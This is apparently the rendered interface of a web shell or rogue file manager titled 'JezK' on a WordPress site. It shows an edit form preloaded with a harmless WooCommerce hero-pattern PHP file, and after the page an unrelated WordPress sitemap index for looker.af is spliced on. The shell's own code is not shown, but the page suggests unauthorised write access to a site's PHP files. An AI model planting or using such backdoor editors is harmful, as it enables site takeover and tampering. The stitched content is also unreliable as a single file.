
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: hero-product-split.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Title: Hero Product Split
 * Slug: woocommerce-blocks/hero-product-split
 * Categories: WooCommerce
 */

use Automattic\WooCommerce\Blocks\AIContent\PatternsHelper;

$hero_title = $content[&#039;titles&#039;][0][&#039;default&#039;] ?? &#039;&#039;;
?&gt;

&lt;!-- wp:media-text {&quot;align&quot;:&quot;full&quot;,&quot;mediaPosition&quot;:&quot;right&quot;,&quot;mediaType&quot;:&quot;image&quot;,&quot;mediaSizeSlug&quot;:&quot;full&quot;,&quot;imageFill&quot;:false,&quot;style&quot;:{&quot;spacing&quot;:{&quot;margin&quot;:{&quot;bottom&quot;:&quot;80px&quot;}}}} --&gt;
&lt;div class=&quot;wp-block-media-text alignfull has-media-on-the-right is-stacked-on-mobile&quot; style=&quot;margin-bottom:80px&quot;&gt;
	&lt;div class=&quot;wp-block-media-text__content&quot;&gt;
		&lt;!-- wp:heading {&quot;level&quot;:3} --&gt;
		&lt;h3 class=&quot;wp-block-heading&quot;&gt;&lt;?php echo esc_html( $hero_title ); ?&gt;&lt;/h3&gt;
		&lt;!-- /wp:heading --&gt;

		&lt;!-- wp:buttons {&quot;style&quot;:{&quot;spacing&quot;:{&quot;margin&quot;:{&quot;bottom&quot;:&quot;var:preset|spacing|40&quot;}}}} --&gt;
		&lt;div class=&quot;wp-block-buttons&quot; style=&quot;margin-bottom:var(--wp--preset--spacing--40)&quot;&gt;
		&lt;!-- wp:button --&gt;
		&lt;div class=&quot;wp-block-button&quot;&gt;
			&lt;a href=&quot;&lt;?php echo esc_url( get_permalink( wc_get_page_id( &#039;shop&#039; ) ) ); ?&gt;&quot; class=&quot;wp-block-button__link wp-element-button&quot;&gt;&lt;?php esc_html_e( &#039;Shop the sale&#039;, &#039;woocommerce&#039; ); ?&gt;&lt;/a&gt;
		&lt;/div&gt;
		&lt;!-- /wp:button --&gt;
		&lt;/div&gt;
		&lt;!-- /wp:buttons --&gt;
	&lt;/div&gt;

	&lt;figure class=&quot;wp-block-media-text__media&quot;&gt;
		&lt;img src=&quot;&lt;?php echo esc_url( PatternsHelper::get_image_url( $images, 0, &#039;assets/images/pattern-placeholders/man-person-winter-photography-statue-coat.png&#039; ) ); ?&gt;&quot; alt=&quot;&lt;?php esc_attr_e( &#039;Placeholder image used to represent a product being showcased in a hero section.&#039;, &#039;woocommerce&#039; ); ?&gt;&quot; /&gt;
	&lt;/figure&gt;
&lt;/div&gt;
&lt;!-- /wp:media-text --&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
